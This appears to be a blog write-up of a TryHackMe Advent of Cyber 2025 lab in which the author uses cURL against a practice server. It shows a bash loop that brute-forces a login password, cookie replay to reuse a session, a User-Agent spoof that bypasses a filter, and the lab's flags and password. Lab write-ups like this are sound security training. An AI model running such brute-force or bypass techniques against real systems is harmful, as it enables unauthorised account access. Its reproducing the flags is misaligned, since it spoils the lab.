Advent of Cyber 2025 - Day 24 - Exploitation with cURL - Hoperation Eggsploit

 

Web Hacking Using cURL – Advent of Cyber 2025 (Day 24)

Introduction

Day 24 of TryHackMe’s Advent of Cyber 2025 dropped us straight into the middle of an intense blue-team operation. According to intel, the Evil Bunnies were keeping a dangerous wormhole open using a web-based control panel hosted on their server. Before confronting King Malhare, the team had one critical task: shut the wormhole down.

There was a catch.

No browser.
No Burp Suite.
No fancy GUI tools.

Just a command line.

This challenge focused entirely on using cURL to interact with web applications, understand HTTP at a raw level, and perform real-world web hacking techniques using only terminal commands.

Learning Objectives

By the end of this room, I learned how to:

  • Understand HTTP requests and responses at a high level

  • Use cURL to send GET and POST requests

  • View raw HTTP responses in the terminal

  • Handle cookies and sessions manually

  • Automate login attempts and brute-force attacks using bash

  • Bypass User-Agent filtering

Understanding HTTP with cURL

Web applications communicate using HTTP (Hypertext Transfer Protocol). Normally, browsers handle this silently in the background, but cURL lets us talk HTTP directly.

To fetch a webpage using a GET request:

curl http://MACHINE_IP/

Instead of rendering a webpage, the terminal displays the raw HTML source, proving that the request was successful.

Sending POST Requests (Login Simulation)

Login forms usually submit data using POST requests. We can replicate this manually with cURL.

Example login attempt:

curl -X POST -d "username=user&password=user" http://MACHINE_IP/post.php

This sends form-encoded data, exactly like a browser would.
The response confirmed invalid credentials.

To view headers and response details:

curl -i -X POST -d "username=user&password=user" http://MACHINE_IP/post.php

Seeing a Set-Cookie header often indicates session creation or successful authentication.

Handling Cookies and Sessions

Unlike browsers, cURL does not automatically store cookies. We must do it manually.

Step 1: Save cookies

curl -c cookies.txt -d "username=admin&password=admin" http://MACHINE_IP/session.php

This saves session cookies (like PHPSESSID) into a file.

Step 2: Reuse cookies

curl -b cookies.txt http://MACHINE_IP/session.php

By replaying the saved cookie, we successfully accessed the authenticated session — just like a logged-in browser.

Automating Brute Force Attacks with cURL

To simulate a brute-force attack, a password list was created:

admin123
password
letmein
secretpass
secret

Then a simple bash loop was used:

for pass in $(cat passwords.txt); do
  echo "Trying password: $pass"
  response=$(curl -s -X POST -d "username=admin&password=$pass" http://MACHINE_IP/bruteforce.php)
  if echo "$response" | grep -q "Welcome"; then
    echo "[+] Password found: $pass"
    break
  fi
done

🎯 Result:
The correct password was secretpass.

This demonstrated how tools like Hydra and Burp Intruder work behind the scenes — repeated HTTP requests with changing parameters.

Bypassing User-Agent Restrictions

Some applications block cURL by detecting its default User-Agent.

To bypass this, we spoofed the User-Agent header:

curl -A "TBFC" http://MACHINE_IP/agent.php

This successfully bypassed the filter and returned the flag.

Flags Captured

ChallengeFlag
POST request successTHM{curl_post_success}
Session cookie reuseTHM{session_cookie_master}
Brute-force passwordsecretpass
User-Agent bypassTHM{user_agent_filter_bypassed}

Bonus Mission (Optional)

The final optional mission involved identifying hidden endpoints, brute-forcing credentials using rockyou.txt, extracting an operator token, and shutting down the wormhole completely.

Once completed, the wormhole closed — reinforcements cut off.

Conclusion – The Final Battle

With the portal shut, King Malhare stood vulnerable.

McSkidy and the Wareville defenders launched their final assault, overwhelming the bunny battalion with snowballs and strategy. Sir Breachblocker III redeemed himself, standing against Sir Carrotbane, and King Malhare was finally captured and imprisoned.

🎉 Wareville was saved.

Final Thoughts

Day 24 was a perfect hands-on lesson in real-world web hacking fundamentals. Using only cURL, I learned how powerful raw HTTP interaction can be — especially when graphical tools are unavailable.

This challenge strengthened my understanding of:

  • HTTP internals

  • Session handling

  • Brute-force logic

  • Manual exploitation techniques

Completing Advent of Cyber 2025 was an incredible journey, and Day 24 was one of the most practical and satisfying rooms.

Merry Soc-Mas and a Hoppy New Year! 🐰❄️

Comments

Post a Comment

Popular Posts